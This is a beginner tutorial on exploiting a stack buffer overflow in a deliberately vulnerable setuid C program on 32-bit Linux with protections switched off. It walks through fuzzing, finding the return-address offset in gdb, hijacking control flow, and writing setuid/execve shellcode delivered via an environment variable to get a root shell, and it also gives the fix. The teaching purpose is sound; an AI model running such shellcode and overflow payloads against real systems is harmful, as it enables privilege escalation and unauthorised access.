Plain Buffer Overflow [Fully Explained]



This is the start of a series of tutorials exploring how to detect and exploit stack-based vulnerabilities on x86-32 Linux systems. As this is the first, it will involve detecting and exploiting a buffer overflow on a system with no protections in place. Modern protections will be explored in future tutorials, but it’s important to understand the basics before trying to take on more complex situations.
A buffer overflow happens when a programmer has not done sufficient bounds checking before or while copying the contents of one buffer into another. A buffer is normally a local array (on the stack) or memory allocated using a dynamic memory allocation function (on the heap). We will be concentrating on stack-based (local array) buffer overflows at first, as they are much easier for beginners to understand.
All of the code in this tutorial was written by the author.

The Vulnerable App: 

Below is the source code of the vulnerable application that we will be attacking. It is written in C.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"
#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(int argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }
    r = checkpass(argv[1]);
    if (r != 0) {
        printf("Wrong password: ");
        printf(argv[1]);
        printf("\n");
        exit(1);
    }
    printfile();
}

int checkpass(char *a)
{
    char p[512];
    int r;

    strncpy(p, a, strlen(a)+1);
    r = strcmp(p, PASS);
    return r;
}

void printfile()
{
    FILE *f;
    int c;

    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            putchar(c);
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}

The Fix:

The code in the above application that is vulnerable to a stack-based buffer overflow is the strncpy call in checkpass (strncpy(p, a, strlen(a)+1);). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer p as strlen(a)+1. This calculation is based on the length of the input provided by the user, so it is controlled by the user rather than by the size of p. To fix this vulnerability, the line should be changed to strncpy(p, a, sizeof(p)-1); (or strncpy(p, a, 511);), followed by p[sizeof(p)-1] = '\0';. We subtract 1 byte to leave space for the terminating null character '\0', and we write it explicitly because strncpy does not add a terminator when the source is at least as long as the count. For more information about strncpy see man strncpy.

Setting Up The Environment:

This is how to set up the environment in full on a Debian-based system:

root@dev:~# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1001) ...
Adding new user `testuser' (1001) with group `testuser' ...
Creating home directory `/home/testuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n]
root@dev:~# ls
app.c
root@dev:~# gcc -z execstack -fno-stack-protector -o app app.c
root@dev:~# cp app /home/testuser/
root@dev:~# cat /proc/sys/kernel/randomize_va_space
2
root@dev:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@dev:~# cat /proc/sys/kernel/randomize_va_space
0
root@dev:~# cd /home/testuser/
root@dev:/home/testuser# ls -l app
-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# chmod u+s app
root@dev:/home/testuser# ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt
root@dev:/home/testuser# chmod 600 secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
root@dev:/home/testuser# su - testuser
testuser@dev:~$ ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
testuser@dev:~$ ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
testuser@dev:~$ cat secret.txt
cat: secret.txt: Permission denied
So our environment is set up and ready for exploit development. First a user, testuser, is added to run the application as. The gcc command then compiles the application with stack protections removed: -fno-stack-protector turns off stack canaries and -z execstack marks the stack as executable. ASLR is disabled by writing 0 to /proc/sys/kernel/randomize_va_space, and chmod u+s sets the setuid bit so that the application runs with root privileges (which is required to read secret.txt, created with the echo command and restricted with chmod 600). Lastly, the final ls and cat commands, run as testuser, confirm that the file is not readable by the user who runs the application.
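The two properties the rest of the walkthrough depends on (the setuid bit on the binary and ASLR being off) can also be read back from a script. The following is only a minimal Python 3 sketch; the helper names are made up for illustration and the path to the binary is assumed to be the one used in the transcript above.

```python
import os
import stat

# Same kernel setting the transcript reads and writes.
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"


def has_setuid_bit(mode):
    """Return True if a st_mode value has the setuid bit (the 's' in -rwsr-xr-x)."""
    return bool(mode & stat.S_ISUID)


def aslr_disabled(text):
    """Interpret the contents of randomize_va_space; "0" means ASLR is off."""
    return text.strip() == "0"


if __name__ == "__main__":
    # Assumed location of the binary; adjust to wherever app was copied.
    target = "/home/testuser/app"
    if os.path.exists(target):
        print("setuid bit set:", has_setuid_bit(os.stat(target).st_mode))
    if os.path.exists(ASLR_PATH):
        with open(ASLR_PATH) as handle:
            print("ASLR disabled:", aslr_disabled(handle.read()))
```

If either check prints False, the addresses and behaviour shown later in this tutorial are unlikely to match.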

Testing App and Finding Vulnerability:

First we need to use the application to figure out its inputs and see how the application acts normally:

testuser@dev:~$ ./app
Usage: ./app <password>
testuser@dev:~$ ./app test
Wrong password: test
testuser@dev:~$ echo $?
1

As we can see, when we enter the wrong password the application’s exit code is 1. Let’s try fuzzing this input to look for a buffer overflow. Here is a simple Python script that can do that:

#!/usr/bin/env python
from subprocess import Popen, PIPE

count = 0  # store the number of A's that caused a crash

# loop through the numbers from 0 to 4999, using i as the counter
for i in range(5000):
    # execute the file ./app with the argument "A"*i so we keep
    # increasing the number of A's by 1
    process = Popen(["./app", "A" * i], stdin=PIPE, stdout=PIPE)
    (output, err) = process.communicate()
    exit_code = process.wait()  # wait for the program's exit code
    if exit_code != 1:  # anything other than the normal "wrong password" exit
        count = i       # set the count to i
        break           # and break out of the loop

print(count)  # print the number of A's it took to crash it

Running the python script gives us:


testuser@dev:~$ python app-fuzz.py
524
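The fuzzer only checks that the exit code is not 1. On POSIX systems Python's subprocess module reports a process killed by a signal as a negative return code, so a segmentation fault shows up as -11. A small Python 3 sketch of how that value could be decoded (describe_exit is a hypothetical helper, not part of the script above):

```python
import signal


def describe_exit(returncode):
    """Translate a subprocess return code into a short description."""
    if returncode < 0:
        # On POSIX, death by signal is reported as the negated signal number.
        return "killed by " + signal.Signals(-returncode).name
    return "exited with status %d" % returncode


print(describe_exit(1))                 # the normal "wrong password" exit
print(describe_exit(-signal.SIGSEGV))   # what a segmentation fault looks like
```

Printing this description alongside the count would make it clear that the run stopped on a crash rather than on some other unexpected exit status.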

Exploiting The App:

So the Python script crashed the application by passing 524 A’s as its input. Just because we crashed the application doesn’t mean we took control of the application’s execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A’s is 524 bytes).
We will use gdb to do this. The hex for A is 41 (you can figure this out using the ASCII man page, man ascii), so what we are looking for is a crash where the application is trying to execute code at address 0x41414141 (as this is a 32-bit system, each address is 32 bits, or 4 bytes, long).
testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A" * 524')
Starting program: /home/testuser/app $(python -c 'print "A" * 524')
Program received signal SIGSEGV, Segmentation fault.
0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) r $(python -c 'print "A" * 528')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 528')
Program received signal SIGSEGV, Segmentation fault.
0xbffff970 in ?? ()
(gdb) r $(python -c 'print "A" * 532')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 532')
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

We increase the number of bytes by 4 each time because addresses on a 32-bit system are 4 bytes wide. With 532 A’s the application crashes while trying to execute at address 0x41414141, which is just AAAA: the last 4 bytes of our input have overwritten the saved return address. So 528 bytes of padding come first, and the 4 bytes after them decide where execution goes.
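Stepping by 4 works here because the offset is small. A different, commonly used technique (not the one used in this tutorial) is to send a non-repeating pattern instead of A's and look up the crash address in it. A minimal Python 3 sketch, with make_pattern and offset_of as illustrative names:

```python
import string


def make_pattern(length):
    """Build a non-repeating pattern (Aa0Aa1Aa2...) of the given length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern is limited to 20280 bytes")


def offset_of(crash_address, length):
    """Return the offset in the pattern of the 4 bytes found in the crash address."""
    # The address holds the 4 pattern bytes in little-endian order.
    needle = crash_address.to_bytes(4, "little").decode("ascii")
    return make_pattern(length).find(needle)


if __name__ == "__main__":
    print(make_pattern(600))
```

The idea would be to run the application in gdb with the printed pattern as its argument and pass the faulting address to offset_of; for this binary the result should agree with the 528 bytes found by hand above.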
I’m going to show you 2 ways you can exploit this. The first is very easy and just involves changing the flow of the application to bypass the password check. First we need to find the address of the code that is run after the check. Again we’ll use gdb for this:

testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     and    esp,0xfffffff0
   0x08048612 <+6>:     sub    esp,0x20
   0x08048615 <+9>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048619 <+13>:    jg     0x804864c <main+64>
   0x0804861b <+15>:    mov    DWORD PTR [esp],0x80487f0
   0x08048622 <+22>:    call   0x8048470 <printf@plt>
   0x08048627 <+27>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804862a <+30>:    mov    eax,DWORD PTR [eax]
   0x0804862c <+32>:    mov    DWORD PTR [esp],eax
   0x0804862f <+35>:    call   0x8048470 <printf@plt>
   0x08048634 <+40>:    mov    DWORD PTR [esp],0x80487f8
   0x0804863b <+47>:    call   0x80484a0 <puts@plt>
   0x08048640 <+52>:    mov    DWORD PTR [esp],0x1
   0x08048647 <+59>:    call   0x80484c0 <exit@plt>
   0x0804864c <+64>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804864f <+67>:    add    eax,0x4
   0x08048652 <+70>:    mov    eax,DWORD PTR [eax]
   0x08048654 <+72>:    mov    DWORD PTR [esp],eax
   0x08048657 <+75>:    call   0x80486a2 <checkpass>
   0x0804865c <+80>:    mov    DWORD PTR [esp+0x1c],eax
   0x08048660 <+84>:    cmp    DWORD PTR [esp+0x1c],0x0
   0x08048665 <+89>:    je     0x804869b <main+143>
   0x08048667 <+91>:    mov    DWORD PTR [esp],0x8048804
   0x0804866e <+98>:    call   0x8048470 <printf@plt>
   0x08048673 <+103>:   mov    eax,DWORD PTR [ebp+0xc]
   0x08048676 <+106>:   add    eax,0x4
   0x08048679 <+109>:   mov    eax,DWORD PTR [eax]
   0x0804867b <+111>:   mov    DWORD PTR [esp],eax
   0x0804867e <+114>:   call   0x8048470 <printf@plt>
   0x08048683 <+119>:   mov    DWORD PTR [esp],0xa
   0x0804868a <+126>:   call   0x8048500 <putchar@plt>
   0x0804868f <+131>:   mov    DWORD PTR [esp],0x1
   0x08048696 <+138>:   call   0x80484c0 <exit@plt>
   0x0804869b <+143>:   call   0x80486f0 <printfile>
   0x080486a0 <+148>:   leave  
   0x080486a1 <+149>:   ret    
End of assembler dump.

I use the -q option to gdb to suppress the informational message that it normally spits out on startup. I then set the disassembly flavor to Intel format because gdb defaults to AT&T format and I prefer Intel.
The call to printfile on line 41 (main+143) looks like a good choice to jump to, and as we can see it is at address 0x0804869b. All we need to do is put this address, with its bytes reversed because x86 is little endian, after the 528 bytes of padding. Here’s how:
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x9b\x86\x04\x08"')
This is a top secret file!
Only people with the password should be able to view this file!
Segmentation fault

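We still get a segmentation fault, but it outputs the contents of the file, meaning we’ve circumvented the password protection. The crash itself is expected: our padding also overwrote the saved frame pointer with A’s, so main cannot return cleanly once printfile has finished.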
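Reversing the address bytes by hand is easy to get wrong. As a sketch of the same payload built in Python 3, struct.pack with the "<I" format produces the little-endian form; the constant names are illustrative, and the values are the ones found above.

```python
import struct

PADDING_LEN = 528            # bytes before the saved return address (found above)
PRINTFILE_CALL = 0x0804869b  # address of "call printfile" in the disassembly


def build_payload(target_address, padding_len=PADDING_LEN):
    """Return the padding followed by the target address in little-endian order."""
    return b"A" * padding_len + struct.pack("<I", target_address)


payload = build_payload(PRINTFILE_CALL)
print(repr(payload[-4:]))  # the four address bytes as they appear in memory
```

The last four bytes match the "\x9b\x86\x04\x08" typed by hand in the command above.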

Developing Shellcode/ Improving Exploitation:

Now I’m going to show you how to use this to run your own code as root. First we need some code to run. I’ve written a quick assembly application in IA-32 assembly which just runs the execve system call with /bin/bash as its argument (for more information on execve itself see man execve):



; run /bin/bash

global _start

section .text

_start:
    jmp short Call_shellcode    ; jump to where our string is

shellcode:
    pop ebx                     ; pop the address of our string into ebx
                                ; which is the first argument to execve
    xor eax, eax                ; zero out the eax register
    mov [ebx +9], al            ; put a 0 where the A is to null
                                ; terminate the /bin/bash string
    mov al, 0xb                 ; put the sys call number 11 into eax
    mov [ebx +10], ebx          ; put a pointer to the beginning
                                ; of the string where the BBBB is
    xor ecx, ecx                ; zero out the ecx register
    mov [ebx +14], ecx          ; replace the CCCC with 0000
    lea ecx, [ebx +10]          ; load the address that used to
                                ; point to BBBB into ecx the second
                                ; argument to execve
    lea edx, [ebx +14]          ; load the address that used to
                                ; point to CCCC into edx the third
                                ; argument to execve
    int 0x80                    ; execute the syscall execve

Call_shellcode:
    call shellcode              ; call the start of the actual application
    shell: db "/bin/bashABBBBCCCC"  ; our string of
                                    ; arguments to execve

A system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx, edx registers respectively; and then running int 0x80 to execute the system call. To find the sys call number do this:

testuser@dev:~$ grep execve /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve 11

This means execve is 11 or 0xb in hex.
In this shellcode I’m using the jmp-call-pop technique to get the address of the string and the list of arguments. When a call instruction executes, the address of the next instruction is pushed onto the stack; here the "next instruction" is our string, so the pop at the start of the shellcode retrieves its address. This makes the code position independent. So we now need to extract this shellcode:
testuser@dev:~$ nasm -f elf32 -o shell.o shell.nasm
testuser@dev:~$ ld -o shell shell.o
testuser@dev:~$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
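The jmp-call-pop layout can be checked directly against the extracted bytes. The Python 3 sketch below (decode_jmp_call is an illustrative helper) follows the leading jmp short to the call, follows the call back to the pop, and returns whatever sits after the call, which should be the string.

```python
import struct

SHELLCODE = (
    b"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
    b"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
    b"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
)


def decode_jmp_call(code):
    """Follow the leading 'jmp short' and the 'call' it lands on."""
    assert code[0] == 0xEB, "expected a jmp short (opcode 0xEB)"
    # jmp short: signed 8-bit offset relative to the next instruction (offset 2).
    jmp_target = 2 + struct.unpack("<b", code[1:2])[0]
    assert code[jmp_target] == 0xE8, "expected a call (opcode 0xE8)"
    # call rel32: signed 32-bit offset relative to the instruction after the call.
    after_call = jmp_target + 5
    rel32 = struct.unpack("<i", code[jmp_target + 1:after_call])[0]
    call_target = after_call + rel32
    # The call pushes the address of after_call, which is where the string starts.
    return jmp_target, call_target, code[after_call:]


jmp_target, call_target, data = decode_jmp_call(SHELLCODE)
print(jmp_target, call_target, data)
```

The call lands on the pop ebx at offset 2, and the data after the call is the /bin/bashABBBBCCCC string, with the A at index 9, BBBB at 10 and CCCC at 14, matching the [ebx +9], [ebx +10] and [ebx +14] operands in the assembly.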

We have shellcode now, but we should test it to make sure it works. The following C application can do that:

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

main()
{
    printf("Shellcode Length: %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}

I’ve split it up onto multiple lines here for readability. Compiling it and running it:


testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length: 49
testuser@dev:/home/testuser$

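It worked. The shellcode test application just casts the byte array to a function pointer and calls it, which runs our shellcode from writable memory. We need this wrapper because you can’t just run the assembled binary directly: the shellcode writes into its own string, which in the standalone binary lives in the read-only .text section: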

testuser@dev:~$ ./shell
Segmentation fault

Now we need to figure out a way to put our shellcode in memory and find its address, so that we can hijack the execution of our vulnerable application with it. We can put it in an environment variable and use getenv to get its address. Here is how we put it into an environment variable:

testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
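The 500 "\x90" bytes in front of the shellcode are x86 NOP instructions, usually called a NOP sled: if execution lands anywhere inside them it slides forward into the shellcode, so the address we jump to does not have to be exact. A short Python 3 sketch of that tolerance (the function names are illustrative, and the address in the example is only a placeholder):

```python
NOP = b"\x90"   # x86 no-operation instruction
SLED_LEN = 500  # same sled length as the export command above


def with_sled(shellcode, sled_len=SLED_LEN):
    """Prefix the shellcode with a run of NOPs."""
    return NOP * sled_len + shellcode


def landing_range(value_address, sled_len=SLED_LEN):
    """Inclusive range of addresses that end up executing the shellcode.

    value_address is assumed to be where the variable's value starts in memory.
    """
    return value_address, value_address + sled_len


low, high = landing_range(0xbffff000)  # placeholder address for illustration
print(hex(low), hex(high))
```

With a sled this long, an address that is off by a few dozen bytes still works, which matters because the exact location of the environment shifts slightly between programs.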

Here is another C application that we can use to get the address of an environment variable in the memory of another application:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char *ptr;

    if (argc < 3) {
        printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
        exit(0);
    }
    ptr = getenv(argv[1]); /* get env var location */
    if (ptr == NULL) {     /* variable is not set in this environment */
        printf("%s is not set\n", argv[1]);
        exit(1);
    }
    ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
    printf("%s will be at %p\n", argv[1], (void *)ptr);
    return 0;
}

We compile this application and run it with the relevant arguments:

testuser@dev:~$ gcc -o getenvaddr getenvaddr.c
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff774
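The only non-obvious step in getenvaddr is the adjustment for the program name: the address getenv returns inside getenvaddr is shifted by two bytes for every character of difference between its own name and the target's name. The Python 3 sketch below just mirrors that arithmetic; the factor of two is taken from the C code as-is, and the raw address in the example is a hypothetical value chosen to be consistent with the output above.

```python
def adjust_env_address(addr_in_helper, helper_name, target_name):
    """Mirror getenvaddr's correction for the difference in program name length."""
    return addr_in_helper + (len(helper_name) - len(target_name)) * 2


# Hypothetical raw getenv() result inside ./getenvaddr.
raw = 0xbffff766
print(hex(adjust_env_address(raw, "./getenvaddr", "./app")))
```

Because the correction depends on the name exactly as typed, the target should be passed in the same form it will be launched with (./app here, not /home/testuser/app).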

Great! Nearly there. We’ve got the address of our shellcode, now to use it. We will hijack the execution flow as we did before, but this time we will point it at the address of our environment variable:

testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x74\xf7\xff\xbf"')
bash-4.2$ whoami
testuser
bash-4.2$ cat secret.txt
cat: secret.txt: Permission denied

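Damn! So it didn’t work. We got a shell, but not as root, so it must be dropping privileges. A setuid binary only changes the effective UID; the real UID is still testuser, and bash resets the effective UID to the real one at startup when the two differ (unless it is started with -p). No need to worry, but we now need to change our shellcode to run the setuid system call before executing execve and set the UID to 0 (root); called with an effective UID of 0, setuid(0) sets the real UID as well (for more information on setuid see man setuid). First we need to find out the sys call number: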


testuser@dev:~$ grep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_setuid 23
#define __NR_setuid32 213

The sys call number is 23 or 0x17 in hex, our modified shellcode is:

; run /bin/bash

global _start

section .text

_start:
    jmp short Call_shellcode    ; jump to where our string is

shellcode:
    xor eax, eax                ; zero out eax
    mov al, 0x17                ; put 23 into eax to setuid
    xor ebx, ebx                ; zero out ebx
    int 0x80                    ; make the syscall setuid
    mov eax, ebx                ; zero out eax
    pop ebx                     ; pop the address of our string into ebx
                                ; which is the first argument to execve
    mov [ebx +9], al            ; put a 0 where the A is to null
                                ; terminate the /bin/bash string
    mov al, 0xb                 ; put the sys call number 11 into eax
    mov [ebx +10], ebx          ; put a pointer to the beginning
                                ; of the string where the BBBB is
    xor ecx, ecx                ; zero out the ecx register
    mov [ebx +14], ecx          ; replace the CCCC with 0000
    lea ecx, [ebx +10]          ; load the address that used to
                                ; point to BBBB into ecx the second
                                ; argument to execve
    lea edx, [ebx +14]          ; load the address that used to
                                ; point to CCCC into edx the third
                                ; argument to execve
    int 0x80                    ; execute the syscall execve

Call_shellcode:
    call shellcode              ; call the start of the actual application
    shell: db "/bin/bashABBBBCCCC"  ; our string of
                                    ; arguments to execve

This is the same as before except I added a call to setuid before it starts setting up the call to execve. Let’s first make sure it works:

testuser@dev:~$ nasm -f elf32 -o shell2.o shell2.nasm
testuser@dev:~$ ld -o shell2 shell2.o
testuser@dev:~$ objdump -d ./shell2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
testuser@dev:~$ cat shellcode.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

main()
{
    printf("Shellcode Length: %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length: 57
testuser@dev:/home/testuser$

That seems to work, let’s test it out:


testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff76c
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x6c\xf7\xff\xbf"')
root@dev:/home/testuser# whoami
root
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!

PWNED!!! :-D


Conclusion: 

It’s very important to understand that when you are developing exploits you are always going to run into problems, which is why I left in the part where I didn’t get root access. You will fail over and over again, but if you keep trying you will find a way to hack it in the end.
This was one of the simplest examples possible, but it is important that you are able to do this before continuing. Don’t worry if you don’t understand how the application’s execution was hijacked or how the stack works. I will explain all of that in later tutorials when it is absolutely necessary; this tutorial is already long enough without going into more depth.
I hope you enjoyed reading this as much as I enjoyed writing it.
Happy Hacking :–)
